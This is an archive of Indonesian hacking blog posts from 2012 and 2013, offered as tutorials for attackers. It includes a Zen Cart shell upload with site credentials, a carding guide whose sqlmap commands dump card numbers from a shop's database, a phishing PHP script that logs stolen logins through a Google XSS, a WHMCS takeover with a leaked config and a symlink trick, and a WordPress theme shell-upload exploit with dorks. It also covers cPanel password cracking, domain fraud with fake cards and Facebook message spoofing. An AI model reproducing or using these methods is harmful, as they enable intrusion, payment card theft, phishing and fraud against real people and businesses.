Monday, 2 December 2013

0 Upload Shell di Zencart

Upload Shell di Zencart – For Newbie
Screenshot
====================================================
[+] Title : Upload Shell di Zencart – For Newbie
[+] Author : afifzi
[+] Category : Hacking
====================================================
langsung aja,,,
1. Kita buka irc dulu untuk scan zencart nya,,,
2. Cari server yang ada bot scannernya, di sini saya menggunakan sever /s irc.jatimcom.net:7000
3. Setelah connect server kita masukkan dorknya, disini saya menggunakan dork : !zencart “zen cart” +Style
4. Setelah itu pilih salah satu site hasil scan kita tadi,
5. Saya memilih
http://cheapgoodingsale.info/admin/login.php

6. Kita buka lalu tinggal masukkan user dan passnya, user : mct, password : wew
7. Kemudian klik Product Types
8. Klik Edit

9. Setelah itu kita browse shell kita dan kita save.
10. Setelah itu kita klik Edit lagi dan block tulisan Product – General dan klik kanan pilih Copy Image Location.

11. Buka tab baru terus Ctrl + V
Sekian tutorial dari Antonkill semoga bermanfaat :D
Special Thanks to :
============================================================================
Indonesia Defacer || Lombok Crew || Team Pocong || IFC || Caliber || Jerinx || jatimcom Crew
============================================================================

Saturday, 25 May 2013

1 How to using Fern-WiFi-Cracker on Backtrack 5 R3

Fern-WiFi-Cracker is a Wireless Penetration Testing Tool written in python. It provides a GUI for cracking wireless networks. Fern Wi-fi cracker automatically run aireplay-ng, airodump-ng and aircrack-ng when you execute Fern-WiFi-Cracker. They are run separately but Fern-WiFi-Cracker  uses the aircrack-ng suite of tools. You can use Fern-WiFi-Cracker  for Session Hijacking or locate geolocation of a particular system based on its Mac address. Before using Fern-WiFi-Cracker make sure that your wireless card supports packet injection.

You can open Fern-WiFi-Cracker with go to
Backtrack >> Exploitation Tools >> Wireless exploitation tools >> WLAN exploitation >> Fern-WiFi-Cracker
Then select your wireless interface
Click the Wi-Fi logo button on the top and it will start the network scanning. You can set setting by double click in the application window.
After scanning you will see active button of WiFi WEP cracking or WPA cracking. Because the available of WiFi is WEP click the button
New dialog box will open. Set the setting  with select the WEP network from the list and select the type of attack. After you complete set the setting now launch the attack with click the Attack button.
Wait until the progress bar 100% complete and after it’s complete the Fern WiFi Cracker will starts aircrack for cracking wifi password.
Password will be shown in the button of window.

Saturday, 30 March 2013

15 Tutorial Carding ( with carding dork & sqlmap )

Tutorial Carding ( with carding dork & sqlmap )

Malam ini saya membuat tutorial karena teman saya ada yg minta .
Pertama kita siapkan tools" nya dahulu :

1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :





Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="


Nah, web tersebut error saat kita inject ,





Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs

Disini kita mendapatkan 3 database :





[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema


Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :






Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+

[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 





Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+



Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini


Semoga bermanfaat :)

Sunday, 10 February 2013

0 Memanfaatkan Bug XSS di Google untuk Phishing (Fake Gmail Login)


Tutorial kali ini membuat Fake gmail login dengan memanfaatkan Bug XSS yang ada di situs Google dengan alamat url http://www.google.com/ig/directory?url=

1. Buat coding dengan format XML, seperti ini http://inwepo.com/test/google.xml

2. Buat coding PHP, berikut ini :

<?php
$username = $_POST['username'];
$password = $_POST['password'];
$logs = "save.txt";
$ld = fopen($logs, 'a') or die(" ");
$data = "$username:$password \n";
fwrite($ld, $data);
echo "Sorry this is Phishing!";
?>

Simpan dengan nama save.php

3. Kemudian upload semua script ke hosting kamu.

4. Akses dengan alamat sesuai nama domain kamu contohnya http://www.google.com/ig/directory?url=inwepo.com/test/google.xml

5. Bila ada seseorang yang mencoba login maka username dan password akan otomatis tersimpan di file txt. Akses dengan alamat  http://inwepo.com/test/save.txt

Sekian, semoga Google mau memperbaiki Bug XSS ini :)

Monday, 31 December 2012

1 WHMCS KILLER V2.php

Udah ada yang pernah denger whmcs? atau whmpanel?
nah di tutorial kali ini, gw mo share cara menggunakan tools WHMCS KILLER
.
apa gunanya?
1. kita bisa login as admin dalam sebuah hosting dan bisa melakukan apa saja sesuka kita, contoh web target ada disana, nah kita tinggal edit cpanel lewat whmcs yang udah kita, bacaaa "HECK" =))
2. kita bisa dapat root cuma"
3. kita bisa dapet cpanel semau kita
4. crack VPS/SERVER
5. Carding / Read clients credit card
6. dll.
.
nah pertama lu kudu punya target whmcs yg ada 1 server dengan shell kalian.
nah biasanya di web tsb, ada tempat login client/admin
biasanya nama tmpat loginnya
/clientarea, /manage, /client /developer /billing /billingclient /bill

kita kudu dapetin config whmcs tsb dengan cara apapun, contoh dengan:
1. Symlink : praktekan command ini "

ln -s/home/user/public_html/folderclient/configuration.php
2. Root server: dengan menggunakan exploit yg bisa anda temukan di google =)) lalu baca file config whmcs
3. Jumping : tapi kayanya kemungkinan 10% cz dir yg mo di read dari group laen chmodnya beda"

.
Nah klo kita udah dapet file config, ini contoh salah satu file cofig whmcs:
------------------------------------------------------------------------------------
<?php
if(isset($_GET['licensedebug']))
{
unset($_GET['licensedebug']);
exit('Access Denied');
}
if(isset($_GET['forceremote']))
{
unset($_GET['forceremote']);
exit('Access Denied');
}
if(isset($_GET['revokelocal']))
{
unset($_GET['revokelocal']);
exit('Access Denied');
}
$license = 'Leased-d8fbbd343a2408bf7d09';
$db_host = 'localhost';
$db_username = '*****************';
$db_password = 'xS%564Ukea}|';
$db_name = '************';
$cc_encryption_hash = 'MM3hLAb9wDEUovvbwy9SSC0ElML4HfOkSHst7utuXYebjAdGYdoGFfbQRMKpSozA';
$templates_compiledir = '/home/myaccoun/whmcs_secured_folders/templates_c/';
$attachments_dir = '/home/myaccoun/whmcs_secured_folders/attachments/';
$downloads_dir = '/home/myaccoun/whmcs_secured_folders/downloads/';
$customadminpath = '__admx';
?>

-----------------------------------------------------------------------

nah klo udah dapet kaya begituan, kita masukin ke WHMCS KILLER.
oh ya password whmcs killernya
username: root
pass: toor

.
isikan identitas target dengan sempurna lalu klik submit....
dari situ ada menu" yg mudah dimengerti, mulai dari edit pass admin/client sampe read password cPANEL :D
DOWNLOAD HERE


Silahkan Sedot : Go to Hell

Tambahan
Username : 123456
Password : 123456

Sekian thx, salam Lamer

Friday, 28 December 2012

0 WordPress GeoPlaces Themes | shell upload vulnerability

Title      : WordPress GeoPlaces Themes | shell upload vulnerability 
Author     : Panda Undetected
Category   : web-apps
Contact    : panda-undetected@mail.com
Facebook   : hozni.monsterjack
Homepage   : http://4rtcode.net/
Vendor     : http://www.geotheme.com/
Date       : 14-Nopember-2012
Tested on  : anything OS
Dork       :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
===========================
exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event
view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]
note -->>
- null
thank's to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker.

video -->>
http://Z190T.com/video/

0 Cara Mendapatkan Unlimited Top-Level Domain (TLD) Gratis



Setelah sekian lama tidak ada kabar lagi untuk mendapat Top-Level Domain (TLD) secara gratis, akhirnya saya telah menemukan cara baru untuk mendapatkannya secara unlimited & tentunya gratis. Dan domain gratis tersebut saya dapat dari Intuit dan telah saya praktekkan untuk semua member di Hosting saya, hasilnya saya telah mendapatkan domain yang saya inginkan secara gratis. Cara ini dengan menggunakan Credit Card khusus untuk Intuit yang bisa order ratusan domain Intuit dalam satu Credit Card. Nah bagi kalian yang ingin mendapat domain .com .org .net .info .biz .name secara gratis seperti saya, silakan ikuti langkah-langkah berikut!

1. Daftar Di sini untuk mendapatkan akunnya.



2. Jika sudah daftar, silakan Sign Out dari akun & biarkan akun tersebut selama 1 atau 2 hari lebih supaya akunnya tidak ditutup sama pihak Intuit. (Kalau saya sampai 2 hari, biar lebih afdol)
3. Setelah sudah 1 atau 2 hari kemudian silakan Sign In kembali di Intuit, lalu klik "Choose a domain (www.yourname.com) for your website".
4. Masukkan nama domain yang kalian inginkan.
4. Jika domain yang kalian inginkan tersedia klik "Get Domain".
5. Selanjutnya isi semua data seperti Nama, Email, Nomor HP, dll.



6. Berikutnya, jangan dicentang Domain Privacy, centang I agree to the Terms of Service dan Submit.



7 . Kemudian akan muncul halaman pop out yang tujuannya untuk meminta informasi dan alamat penagihan domain kalian (Domain yang kalian minta gratis, tapi untuk melindungi terhadap penipuan mereka membutuhkan informasi penagihan domain kalian.). Pada bagian Credit Card, masukkan Credit Card khususnya, silakan isi seperti di gambar!



8. Terakhir klik Purchase dan selamat Anda sudah mendapatkan Top-Level Domain (TLD) 1 tahun gratis!



9. Untuk mengatur Nameserver atau DNS nya silakan tunggu 24 jam sampai proses domain selesai.



10. Jika kalian mau order domain lagi cukup dihapus saja domain yang sebelumnya. (Domain tidak akan mati). Pastikan juga Nameserver atau DNS nya sudah diatur.





11. Dan ulangi lagi seperti nomor 4, begitulah sampai seterusnya. Tidak perlu menunggu 1 atau 2 hari lagi.

Dengan satu akun kita bisa order domain sepuasnya.

NB:
Bagi yang sudah punya akun Intuit yang dulu/sebelumnya bisa juga pakai cara ini.
Nameserver atau DNS hanya bisa digantikan sekali saja.
Domain hanya gratis 1 tahun dan tidak bisa diperpanjang.
Tolong jangan memperjualbelikan domain ini supaya trik ini tidak mati.

Sumber : putra.la

Wednesday, 26 December 2012

5 How to crack cpanel / Cara crack cpanel


Langsung saja...

Yang dibutuhkan :-


  • Shelled site
  • Cpanel Password Cracker (shell)


Step By Step Tutorial :-

  • Pertama buka shell kamu & lalu upload cpanel password cracker shell . Download Cpanel password cracker shell disini & Password List disini
  • Lalu scroll ke bawah & click bagian User .



  • Sekarang setelah Anda mengklik User, di bawah ini Anda akan mendapatkan semua username dari Cpanel tersebut. Jadi sekarang pindah ke langkah berikutnya, langkah berikutnya Anda akan mendapatkan daftar Sandi baik untuk serangan Dictionary. Setelah mendapatkan itu Anda harus menyalin username & tempel di blok nama pengguna (atas) & paste daftar kata sandi di blok sandi. Kemudian akhirnya klik start

Tip: Daftar Sandi harus pendek & efektif.





  • Setelah cracking selesai, di halaman berikutnya Anda akan melihat hasilnya.


  • Setelah Mendapatkan informasi login, Anda dapat login dengan pergi -> www.site.com:2082. Di sini Anda akan mendapatkan bidang login cpanel.

Tuesday, 25 December 2012

0 How to get free / Cara mendapatkan domain gratis .ME [ 1 Tahun ]

Ini adalah tutor cara mendapatkan domain gratis .ME selama 1 tahun.
FREE DOMAIN ME FOR 1 YEAR ' s
GRAB IT FAST!! Siapa cepat dia dapat :p
Contoh >>>> WWW.4RTCODE.ME <<<<



Bahan - bahan yang dibutuhkan :
1. Email Yahoo (Gmail masuk spam)
2. Jaringan internet (Ya iyalaaahhhhh... masa ya iyaa dong :D)


Step By Step :

1. Pertama-tama download: http://www.mozilla.org/en-US/thunderbird/all.html dan download thunderbird apa saja. Lalu install, kalau udah selesai buka thunderbird klik register new account, centang option gandi.net nya saja.


2. Lalu di kotak "Search" ketik nama domain yang diinginkan co: kakatua... lalu klik "Search".




3. Klik "contact@kakatua.me" ... Hingga muncul halaman selanjutnya.

4. Muncul halaman seperti dibawah, lalu klik "BUY"



5. Lalu register "New Account" di gandi.net. Isi terserah anda alamat dllnya. lalu submit. Jangan lupa Passwordnya.



6.  Setelah registrasi di gandi.net selesai, maka muncul halaman berikut.



7.  Pada tab Mailbox di gandi.net masukin password sesuai dengan registrasi di gandi.net.



8.  Setelah login maka tampilannya seperti ini.



9. Buka email yang buat registrasi di gandi.net, lalu buka email dari gandi 

[GANDI] Your Gandi Handle

Hello, and welcome to Gandi!

Further to the creation of your handle on 2012-11-22 11:15:36.805221, please note that your new Gandi handle is  KK1859-GANDI: << yang dipakai untuk login.


Lalu buka link berikut : 
Nah masukan user : KK1859-GANDI dan Password untuk login di gandi.net untuk mensetup nameserver dan lain lain.


SELAMAT MENCOBA !!!!

Update : Disini untuk melihat who.is domain .me >> http://www.domain.me/domain-search

UPDATE
GUNAKAN IP BELANDA  [entah ganti proxy (cari di hidemyass) atau VPN belanda atau SSH belanda] ane pake cyberghost VPN.


Wednesday, 12 December 2012

0 Cara Inbox Siapapun Memakai Akun Siapapun Di Facebook

Pada kesempatan kali ini,saya akan share trik yang lumayan iseng,yaitu cara menginbox siapapun menggunakan akun siapapun di Facebook,siapapun yang saya maksudkan disini adalah teman Anda di Facebook. Namun sebelum menerangkan cara-caranya,ada baiknya saya sampaikan bahwa "gunakan trik ini dengan bijak,jangan salah gunakan hingga merugikan orang lain". Segala sesuatu murni menjadi tanggung jawab Anda masing-masing.


Nah,tanpa perlu basa-basi lagi simak langkah-langkahnya berikut ini:

Langkah 1: Pertama Anda perlu memilih 2 orang dari daftar teman Anda. Satu akan menjadi pengirim  dan satu yang akan menjadi penerima tersebut.
Katakanlah kita memilih Ayu sebagai pengirim inbox dan Yudha sebagai penerima.
Langkah 2: Karena Ayu yang akan mengirimkan inbox kita perlu untuk mendapatkan email login Facebooknya. Karena email login Ayu tersembunyi kita perlu menggunakan trik import account. Caranya pergi ke Yahoo dan pilih login dengan Facebook

                                                   

Setelah Anda telah mengatur semuanya klik impor kontak dari Facebook. dan Boom, Anda memiliki hampir semua alamat email di daftar teman Anda. Pilih calon pengirim  dan salin alamat email-nya. Katakanlah email Ayu adalah ayu.sweet@yahoo.com

                                     


Langkah 3: Pergi ke http://emkei.cz/, Ini adalah layanan fake mailer yang dapat mengirim email kepada siapa pun atas nama siapa pun. Tulis alamat email pengirim di kolom From name dan From email, contoh:
From name:  ayu.sweet@yahoo.com
From email:   ayu.sweet@yahoo.com

Langkah 4: Sekarang Anda harus mengetahui email penerima. Caranya pergi ke profil Facebook calon penerima inbox dan klik tentang, dan copy email kontak mereka  [ blabla@facebook.com ].
Katakanlah email kontak  facebook Yudha adalah yudha.gayanajie @ facebook.com

Langkah 5: Kembali ke layanan fake mailer tadi dan isi form 'To:' dengan alamat email Facebook calon penerima, contoh:
To: yudha.gayanajie@ facebook.com

Langkah 6: Jangan menulis apa pun di 'Subyek:' langsung saja ke 'Text:' dan tulis apa yang ingin Anda katakan yang nantinya akan muncul di inbox korban.
Lengkapnya terlihat seperti:
                                                 




Langkah 7: Isi Captcha dan klik send.

Anda sekarang telah mengirimkan inbox dari akun teman Anda untuk akun teman Anda yang lain. Tapi dari beberapa percobaan yang saya lakukan terhadap trik ini,akan berpotensi mengakibatkan kesalah pahaman.Untuk itu sekali lagi saya tekankan " Gunakan trik ini dengan bijak,segala konsekuensi menjadi tanggung jawab Anda sendiri". Use its your own risk!!

Semoga berhasil :v

Find Us on Facebook !